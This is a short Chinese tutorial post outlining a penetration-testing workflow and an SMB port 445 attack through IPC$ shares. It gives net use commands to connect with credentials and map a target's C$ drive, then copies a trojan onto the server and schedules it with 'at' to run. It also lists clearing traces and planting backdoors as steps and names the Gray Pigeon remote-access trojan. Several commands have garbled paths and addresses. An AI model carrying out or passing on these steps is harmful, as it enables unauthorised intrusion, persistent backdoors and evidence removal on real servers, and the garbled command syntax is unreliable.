1、渗透测试简单流程
- 授权,授权外部人员可以对公司内部做渗透
- 信息收集,nslookup、whois
- 扫描漏洞(目的:拿到服务器的最高控制权,远程控制):
- namp软件——IP范围、端口 80(网页服务器——IIS / Apache,什么网站)
- scanport,手动测试端口号开放:telnet IP port
- 高级扫描,如扫描IIS漏洞——2003-6.0版本 / 2008-7.0版本,扫描网站漏洞(十大漏洞)
- 漏洞利用
- 提权:shell环境、桌面环境、最高权限
- 清除操作痕迹
- 留后门,制作木马,将木马植入服务器,以便下次控制
- 渗透测试报告、安全加固方案
2、445漏洞利用流程:
- scanport稻苗445端口
- 漏洞利用——IPC$
- 利用命令建立对服务器的链接,可以实现用命令操控服务器
```clojure net use f: \1.01.1.2:share 密码 /user:用户名net use \\10.1.1.2:ipc$ 密码 /user:用户名
将对方的共享文件夹映射到本地的F盘
net use f: /del
删除F盘的映射
net use * /del
同上
net use f: \10.1.1.2:c$ 密码 /user:用户名
将对方的C盘映射到本地F盘
4. 利用软件制作木马4. 植入木马()```clojurecopy d:\木马程序.exe(本地木马程序存放路径) \\10.1.1.2\c$(服务器C盘下)
设置计划任务自动执行木马
net time \\10.1.1.2 #查看服务器时间at \\10.1.1.2 time(上一步命令获取的时间延后几分钟) "c:木马程序.exe"
等待肉鸡上线
需要的软件:端口扫描软件(用户名字典、密码字典)、木马软件(灰鸽子……)
若有收获,就点个赞吧
0 人点赞
